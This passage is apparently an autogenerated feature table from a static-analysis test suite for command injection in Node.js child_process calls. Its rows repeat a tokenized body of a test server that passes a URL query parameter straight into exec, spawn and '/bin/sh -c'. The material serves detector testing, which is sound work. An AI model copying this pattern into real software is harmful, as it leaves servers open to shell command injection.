execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | run | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | run | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | run | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | run | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | run | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | this | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | this | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | this | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | url | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | url | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:5:31 | url | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | 'arguments' object of anonymous function | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | exceptional return of anonymous function | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | exceptional return of anonymous function | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | exceptional return of anonymous function | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | functio ... CY] \\n\\n} | CalleeFlexibleAccessPath | http.createServer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | functio ... CY] \\n\\n} | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | functio ... CY] \\n\\n} | calleeImports | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | functio ... CY] \\n\\n} | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | functio ... CY] \\n\\n} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | functio ... CY] \\n\\n} | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | functio ... CY] \\n\\n} | receiverName | http | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | return of anonymous function | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | return of anonymous function | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:32:64:1 | return of anonymous function | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:41:5:43 | req | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:41:5:43 | req | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:41:5:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:41:5:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:41:5:43 | req | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:41:5:43 | req | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:41:5:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:41:5:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:41:5:43 | req | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:41:5:43 | req | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:46:5:48 | res | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:46:5:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:46:5:48 | res | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:46:5:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:5:46:5:48 | res | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:9:6:11 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:9:6:11 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:9:6:11 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:9:6:11 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:9:6:11 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:9:6:49 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:9:6:49 | cmd | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:9:6:49 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:9:6:49 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:9:6:49 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:9:6:49 | cmd = u ... ry.path | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:9:6:49 | cmd = u ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:9:6:49 | cmd = u ... ry.path | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:9:6:49 | cmd = u ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:9:6:49 | cmd = u ... ry.path | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:17 | url | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:17 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:17 | url | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:17 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:17 | url | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:23 | url.parse | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:23 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:23 | url.parse | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:23 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:23 | url.parse | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:38 | exceptional return of url.par ... , true) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:38 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:38 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:38 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:38 | exceptional return of url.par ... , true) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:38 | url.par ... , true) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:38 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:38 | url.par ... , true) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:38 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:38 | url.par ... , true) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:44 | url.par ... ).query | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:44 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:44 | url.par ... ).query | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:44 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:44 | url.par ... ).query | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:49 | url.par ... ry.path | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:49 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:6:15:6:49 | url.par ... ry.path | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args 